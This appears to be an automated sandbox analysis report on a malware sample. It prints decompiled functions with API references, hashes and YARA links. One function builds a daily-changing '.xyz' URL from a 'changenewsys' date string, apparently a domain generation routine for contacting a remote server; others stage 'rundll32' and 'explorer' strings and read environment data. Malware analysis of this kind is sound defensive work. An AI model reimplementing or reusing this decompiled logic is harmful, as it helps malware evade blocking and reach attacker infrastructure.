                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3854912713-0
                                                                                                                                                      • Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
                                                                                                                                                      • Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100223F0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100254e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100254e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100254f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100254f4; // 0x0
				_v300 = _t116;
				E1000CF20(__edi,  &_v292, 0, 0x108);
				E1001F150( &_v24,  &_v292,  &_v24);
				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
				_t118 = _a4;
				_v12 = E1000CAC0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296);
				E1000CF20(_t131, _v8, 0, _v296);
				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4));
				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA30(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}
























                                                                                                                                                      0x100223f0
                                                                                                                                                      0x100223f0
                                                                                                                                                      0x100223f0
                                                                                                                                                      0x100223f9
                                                                                                                                                      0x100223fe
                                                                                                                                                      0x10022401
                                                                                                                                                      0x10022407
                                                                                                                                                      0x1002240a
                                                                                                                                                      0x10022410
                                                                                                                                                      0x10022413
                                                                                                                                                      0x10022418
                                                                                                                                                      0x1002241e
                                                                                                                                                      0x10022424
                                                                                                                                                      0x1002242a
                                                                                                                                                      0x10022430
                                                                                                                                                      0x10022444
                                                                                                                                                      0x10022457
                                                                                                                                                      0x1002246c
                                                                                                                                                      0x10022474
                                                                                                                                                      0x10022480
                                                                                                                                                      0x10022483
                                                                                                                                                      0x10022490
                                                                                                                                                      0x10022495
                                                                                                                                                      0x1002249b
                                                                                                                                                      0x1002249b
                                                                                                                                                      0x1002249e
                                                                                                                                                      0x100224be
                                                                                                                                                      0x100224be
                                                                                                                                                      0x100224c1
                                                                                                                                                      0x100224a0
                                                                                                                                                      0x100224a3
                                                                                                                                                      0x100224a4
                                                                                                                                                      0x100224b3
                                                                                                                                                      0x100224b3
                                                                                                                                                      0x100224d6
                                                                                                                                                      0x100224e6
                                                                                                                                                      0x10022503
                                                                                                                                                      0x10022521
                                                                                                                                                      0x10022532
                                                                                                                                                      0x1002254a
                                                                                                                                                      0x10022559
                                                                                                                                                      0x10022572
                                                                                                                                                      0x1002258b
                                                                                                                                                      0x1002258e
                                                                                                                                                      0x100225a5
                                                                                                                                                      0x100225b0
                                                                                                                                                      0x100225b1
                                                                                                                                                      0x100225c2

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen
                                                                                                                                                      • String ID: explorer$rundll32
                                                                                                                                                      • API String ID: 1975251954-2912785976
                                                                                                                                                      • Opcode ID: f6ce6eaccbca0f7d6fa6ae5db2ab446715a916ae53a0c09ee7bb2c187418f45f
                                                                                                                                                      • Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
                                                                                                                                                      • Opcode Fuzzy Hash: f6ce6eaccbca0f7d6fa6ae5db2ab446715a916ae53a0c09ee7bb2c187418f45f
                                                                                                                                                      • Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004010E0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E004010E0() {
				intOrPtr _v0;
				short _v28;
				short _v32;
				char _v61;
				char _v62;
				char _v63;
				struct tagLOGFONTA _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				short _v70;
				short _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagLOGBRUSH _v100;
				short _t49;
				struct HFONT__* _t50;
				intOrPtr _t51;
				intOrPtr* _t57;
				signed int _t58;
				signed char _t61;
				short _t67;
				short _t68;
				intOrPtr _t82;

				memset( &(_v64.lfWidth), 0, 0xf << 2);
				_t49 =  *"Arial"; // 0x61697241
				_t67 =  *0x40d1cc; // 0x6c
				_v72 = 0xe6cc;
				_v70 = 0x48c6;
				_v68 = 0x9a;
				_v67 = 0x35;
				_v66 = 0xc0;
				_v65 = 0xf9;
				_v64.lfHeight = 7;
				_v63 = 0xe5;
				_v62 = 0xda;
				_v61 = 0xb9;
				_v64.lfWidth.lfHeight = 0x10;
				_v64.lfItalic = 0x190;
				_v32 = _t49;
				_v28 = _t67;
				_t50 = CreateFontIndirectA( &(_v64.lfWidth));
				_t82 = _v0;
				_v64.lfHeight = 0x10;
				 *(_t82 + 0x18) = _t50;
				_t51 =  *((intOrPtr*)("Arial")); // 0x61697241
				_t68 =  *0x40d1cc; // 0x6c
				_v64.lfWeight = 0x320;
				_v64.lfFaceName = _t51;
				_v32 = _t68;
				 *((intOrPtr*)(_t82 + 0x1c)) = CreateFontIndirectA( &_v64);
				_v100.lbColor.lbStyle = 0;
				_v100.lbHatch = 0xffffff;
				 *((intOrPtr*)(_t82 + 0x20)) = CreateBrushIndirect( &(_v100.lbColor));
				_v100.lbStyle = 0;
				_v100.lbColor.lbStyle = 0xc8c8c8;
				 *((intOrPtr*)(_t82 + 0x24)) = CreateBrushIndirect( &_v100);
				 *((intOrPtr*)(_t82 + 0xc)) = LoadBitmapA( *(_t82 + 4), 0x65);
				_t57 =  &_v88 + 0xc - 0x10;
				 *_t57 = 0xd657ec7b;
				 *((intOrPtr*)(_t57 + 4)) = _v88;
				 *((intOrPtr*)(_t57 + 8)) = _v84;
				 *((intOrPtr*)(_t57 + 0xc)) = _v80;
				_t58 = E00403570();
				 *(_t82 + 0x2c) = _t58;
				if(_t58 != 0) {
					 *((intOrPtr*)(_t82 + 0x30)) = E00403660(_t58);
					_t61 = E004036A0( *(_t82 + 0x2c), _t82 + 0x34);
					asm("sbb eax, eax");
					return _t61 & 0x000000fe;
				} else {
					return _t58 | 0xffffffff;
				}
			}





























                                                                                                                                                      0x004010f1
                                                                                                                                                      0x004010f3
                                                                                                                                                      0x004010f8
                                                                                                                                                      0x0040110f
                                                                                                                                                      0x00401116
                                                                                                                                                      0x0040111d
                                                                                                                                                      0x00401122
                                                                                                                                                      0x00401127
                                                                                                                                                      0x0040112c
                                                                                                                                                      0x00401131
                                                                                                                                                      0x00401136
                                                                                                                                                      0x0040113b
                                                                                                                                                      0x00401140
                                                                                                                                                      0x00401145
                                                                                                                                                      0x0040114d
                                                                                                                                                      0x00401155
                                                                                                                                                      0x00401159
                                                                                                                                                      0x0040115e
                                                                                                                                                      0x00401160
                                                                                                                                                      0x00401169
                                                                                                                                                      0x00401171
                                                                                                                                                      0x00401174
                                                                                                                                                      0x00401179
                                                                                                                                                      0x00401180
                                                                                                                                                      0x00401188
                                                                                                                                                      0x0040118c
                                                                                                                                                      0x00401199
                                                                                                                                                      0x004011a0
                                                                                                                                                      0x004011a9
                                                                                                                                                      0x004011b7
                                                                                                                                                      0x004011bb
                                                                                                                                                      0x004011c3
                                                                                                                                                      0x004011d3
                                                                                                                                                      0x004011e3
                                                                                                                                                      0x004011ea
                                                                                                                                                      0x004011ec
                                                                                                                                                      0x004011ee
                                                                                                                                                      0x004011f5
                                                                                                                                                      0x004011f8
                                                                                                                                                      0x004011fb
                                                                                                                                                      0x00401203
                                                                                                                                                      0x00401208
                                                                                                                                                      0x0040121a
                                                                                                                                                      0x00401225
                                                                                                                                                      0x00401236
                                                                                                                                                      0x00401240
                                                                                                                                                      0x0040120a
                                                                                                                                                      0x00401213
                                                                                                                                                      0x00401213

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFontIndirectA.GDI32 ref: 0040115E
                                                                                                                                                      • CreateFontIndirectA.GDI32(00000007), ref: 00401191
                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004011B1
                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004011CB
                                                                                                                                                      • LoadBitmapA.USER32 ref: 004011D6
                                                                                                                                                        • Part of subcall function 00403570: GetTickCount.KERNEL32 ref: 00403577
                                                                                                                                                        • Part of subcall function 00403570: SetupDiGetClassDevsA.SETUPAPI(?,00000000,00000000,00000012), ref: 00403593
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateIndirect$BrushFont$BitmapClassCountDevsLoadSetupTick
                                                                                                                                                      • String ID: 5$Arial
                                                                                                                                                      • API String ID: 1147224935-541822079
                                                                                                                                                      • Opcode ID: d60dfe3b84b4a58d9a5d83f059e2646c64ce9c7cc266f314e3cdc9e552848854
                                                                                                                                                      • Instruction ID: b55f597ceb39f0a81ff7d757ff3f92b208840d329d66038bf8bb08e1a96f4faf
                                                                                                                                                      • Opcode Fuzzy Hash: d60dfe3b84b4a58d9a5d83f059e2646c64ce9c7cc266f314e3cdc9e552848854
                                                                                                                                                      • Instruction Fuzzy Hash: 8A4149705087419FC310DF29C944A4BBBE4EF89328F008E2DE499A73A1E775E5098B9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040686B, Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                      			E0040686B() {
				int _v4;
				int _v8;
				void* __ecx;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				void* _t33;
				void* _t35;
				CHAR* _t37;
				WCHAR* _t39;
				void* _t40;
				int _t43;

				_t7 =  *0x410980; // 0x0
				_t32 = 0;
				_t39 = 0;
				_t37 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t37 != _t32) {
							L20:
							_t9 = _t37;
							if( *_t37 == _t32) {
								L23:
								_t42 = _t9 - _t37 + 1;
								_t40 = E00403A89(_t33, _t9 - _t37 + 1);
								if(_t40 != _t32) {
									E00405F40(_t40, _t37, _t42);
								} else {
									_t40 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t40;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t37 = GetEnvironmentStrings();
						if(_t37 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t39 != _t32) {
						L8:
						_t17 = _t39;
						if( *_t39 == _t32) {
							L11:
							_t20 = (_t17 - _t39 >> 1) + 1;
							_v4 = _t20;
							_t43 = WideCharToMultiByte(_t32, _t32, _t39, _t20, _t32, _t32, _t32, _t32);
							if(_t43 != _t32) {
								_t24 = E00403A89(_t33, _t43);
								_pop(_t35);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t39, _v4, _t24, _t43, _t32, _t32) == 0) {
										E004039A0(_t35, _v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t39);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t39 = GetEnvironmentStringsW();
					if(_t39 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t39 = GetEnvironmentStringsW();
				if(_t39 == 0) {
					_t37 = GetEnvironmentStrings();
					if(_t37 == 0) {
						goto L27;
					}
					 *0x410980 = 2;
					goto L18;
				}
				 *0x410980 = 1;
				goto L6;
			}


















                                                                                                                                                      0x0040686d
                                                                                                                                                      0x0040687c
                                                                                                                                                      0x0040687e
                                                                                                                                                      0x00406880
                                                                                                                                                      0x00406884
                                                                                                                                                      0x004068bc
                                                                                                                                                      0x00406946
                                                                                                                                                      0x00406994
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406994
                                                                                                                                                      0x00406948
                                                                                                                                                      0x0040694a
                                                                                                                                                      0x00406958
                                                                                                                                                      0x0040695a
                                                                                                                                                      0x0040695c
                                                                                                                                                      0x00406968
                                                                                                                                                      0x0040696b
                                                                                                                                                      0x00406973
                                                                                                                                                      0x00406978
                                                                                                                                                      0x00406981
                                                                                                                                                      0x0040697a
                                                                                                                                                      0x0040697a
                                                                                                                                                      0x0040697a
                                                                                                                                                      0x0040698a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040695e
                                                                                                                                                      0x0040695e
                                                                                                                                                      0x0040695e
                                                                                                                                                      0x0040695e
                                                                                                                                                      0x0040695f
                                                                                                                                                      0x00406963
                                                                                                                                                      0x00406964
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040695e
                                                                                                                                                      0x00406952
                                                                                                                                                      0x00406956
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406956
                                                                                                                                                      0x004068c2
                                                                                                                                                      0x004068c4
                                                                                                                                                      0x004068d2
                                                                                                                                                      0x004068d5
                                                                                                                                                      0x004068d7
                                                                                                                                                      0x004068e7
                                                                                                                                                      0x004068f3
                                                                                                                                                      0x004068fa
                                                                                                                                                      0x00406900
                                                                                                                                                      0x00406904
                                                                                                                                                      0x00406907
                                                                                                                                                      0x0040690e
                                                                                                                                                      0x0040690f
                                                                                                                                                      0x00406913
                                                                                                                                                      0x00406924
                                                                                                                                                      0x0040692a
                                                                                                                                                      0x00406930
                                                                                                                                                      0x00406930
                                                                                                                                                      0x00406934
                                                                                                                                                      0x00406934
                                                                                                                                                      0x00406913
                                                                                                                                                      0x00406939
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068da
                                                                                                                                                      0x004068db
                                                                                                                                                      0x004068e1
                                                                                                                                                      0x004068e2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068d9
                                                                                                                                                      0x004068c8
                                                                                                                                                      0x004068cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068cc
                                                                                                                                                      0x00406888
                                                                                                                                                      0x0040688c
                                                                                                                                                      0x004068a0
                                                                                                                                                      0x004068a4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068aa
                                                                                                                                                      0x0040688e
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00406886
                                                                                                                                                      • GetEnvironmentStrings.KERNEL32 ref: 0040689A
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 004068C6
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004068FE
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00406920
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00406939
                                                                                                                                                      • GetEnvironmentStrings.KERNEL32 ref: 0040694C
                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040698A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1823725401-0
                                                                                                                                                      • Opcode ID: 339a8cec8eba2374dbba394ec5917f6ba435be108e2437be42f3420f26441754
                                                                                                                                                      • Instruction ID: cb2d569cf86d10741901bdab4dcf8e60e262cd169569d6f018d01fb75fa15f46
                                                                                                                                                      • Opcode Fuzzy Hash: 339a8cec8eba2374dbba394ec5917f6ba435be108e2437be42f3420f26441754
                                                                                                                                                      • Instruction Fuzzy Hash: E731F0F35052252EEB203FB85C8483BBADCE645758B16053FF583F3280E6399C6186AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100225D0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                      			E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				struct _SYSTEMTIME _v36;
				char _v303;
				char _v304;
				char _v332;
				char _v360;
				char _v388;
				signed int _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				void* __ebp;
				intOrPtr _t91;

				_t97 = __eflags;
				_t89 = __edi;
				_push(0xffffffff);
				_push(E10022A77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_v392 = 0;
				E10001160( &_v332, __eflags, "http://");
				_v8 = 0;
				_v304 = 0;
				E1000CF20(__edi,  &_v303, 0, 0x103);
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetLocalTime( &_v36);
				_push(_v36.wDay & 0x0000ffff);
				_push(_v36.wMonth & 0x0000ffff);
				E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
				_v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
				_v396 = E10001160( &_v360, _t97, _v20);
				_v400 = _v396;
				_v8 = 1;
				E10001A70( &_v332, _v400);
				_v8 = 0;
				E100011A0( &_v360);
				_push(_v20);
				E1000CA30(__ebx, _t89, __esi, _t97);
				_v404 = E10001160( &_v388, _t97, ".xyz/");
				_v408 = _v404;
				_v8 = 2;
				E10001A70( &_v332, _v408);
				_v8 = 0;
				E100011A0( &_v388);
				E10001110(_a4, _t97,  &_v332);
				_v392 = _v392 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v332);
				 *[fs:0x0] = _v16;
				return _a4;
			}



















                                                                                                                                                      0x100225d0
                                                                                                                                                      0x100225d0
                                                                                                                                                      0x100225d3
                                                                                                                                                      0x100225d5
                                                                                                                                                      0x100225e0
                                                                                                                                                      0x100225e1
                                                                                                                                                      0x100225ee
                                                                                                                                                      0x10022603
                                                                                                                                                      0x10022608
                                                                                                                                                      0x1002260f
                                                                                                                                                      0x10022624
                                                                                                                                                      0x1002262c
                                                                                                                                                      0x10022634
                                                                                                                                                      0x10022637
                                                                                                                                                      0x1002263a
                                                                                                                                                      0x1002263d
                                                                                                                                                      0x10022645
                                                                                                                                                      0x1002264f
                                                                                                                                                      0x10022654
                                                                                                                                                      0x10022666
                                                                                                                                                      0x1002267d
                                                                                                                                                      0x1002268f
                                                                                                                                                      0x1002269b
                                                                                                                                                      0x100226a1
                                                                                                                                                      0x100226b2
                                                                                                                                                      0x100226b7
                                                                                                                                                      0x100226c1
                                                                                                                                                      0x100226c9
                                                                                                                                                      0x100226ca
                                                                                                                                                      0x100226e2
                                                                                                                                                      0x100226ee
                                                                                                                                                      0x100226f4
                                                                                                                                                      0x10022705
                                                                                                                                                      0x1002270a
                                                                                                                                                      0x10022714
                                                                                                                                                      0x10022723
                                                                                                                                                      0x10022731
                                                                                                                                                      0x10022737
                                                                                                                                                      0x10022744
                                                                                                                                                      0x1002274f
                                                                                                                                                      0x10022759

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 10022624
                                                                                                                                                      • GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                      • _sprintf.LIBCMT ref: 10022666
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .xyz/$changenewsys%04d%02d%02d$http://
                                                                                                                                                      • API String ID: 984892819-377150047
                                                                                                                                                      • Opcode ID: ae2ccc42162147e484f91380aeb397814b995b1e8bb40a03b6c619cd9c6de717
                                                                                                                                                      • Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
                                                                                                                                                      • Opcode Fuzzy Hash: ae2ccc42162147e484f91380aeb397814b995b1e8bb40a03b6c619cd9c6de717
                                                                                                                                                      • Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403570, Relevance: 10.6, APIs: 7, Instructions: 83fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 30%
                                                                                                                                                      			E00403570(char _a4) {
				char _v12;
				char _v44;
				char _v64;
				char _v72;
				char _v88;
				char _v92;
				intOrPtr _v96;
				signed int _t12;
				char* _t15;
				void* _t26;
				intOrPtr* _t27;
				char* _t34;
				void* _t35;
				intOrPtr* _t37;

				_t26 = 0;
				_t12 = GetTickCount();
				 *0x40d5e4 = _t12 *  *0x40d5e4 + 1;
				_t15 =  &_a4;
				__imp__SetupDiGetClassDevsA(_t15, 0, 0, 0x12);
				_t34 = _t15;
				if(_t34 != 0xffffffff) {
					_v44 = 0x1c;
					__imp__SetupDiEnumDeviceInterfaces(_t34, 0,  &_v12, 0,  &_v44, _t35);
					if(_t15 != 0) {
						_t27 = __imp__SetupDiGetDeviceInterfaceDetailA;
						 *_t27(_t34,  &_v64, 0, 0,  &_v72, 0);
						_t37 = E00403A89( &_v64, _v96);
						 *_t37 = 5;
						_t30 = _v96;
						 *_t27(_t34,  &_v88, _t37, _v96,  &_v92, 0);
						_t11 = _t37 + 4; // 0x4
						_t26 = CreateFileA(_t11, 0xc0000000, 1, 0, 3, 0x800, 0);
						if(_t37 != 0) {
							E004039A0(_t30, _t37);
						}
					}
					__imp__SetupDiDestroyDeviceInfoList(_t34);
					return _t26;
				} else {
					return 0;
				}
			}

















                                                                                                                                                      0x00403575
                                                                                                                                                      0x00403577
                                                                                                                                                      0x00403587
                                                                                                                                                      0x0040358d
                                                                                                                                                      0x00403593
                                                                                                                                                      0x00403599
                                                                                                                                                      0x0040359e
                                                                                                                                                      0x004035b8
                                                                                                                                                      0x004035c0
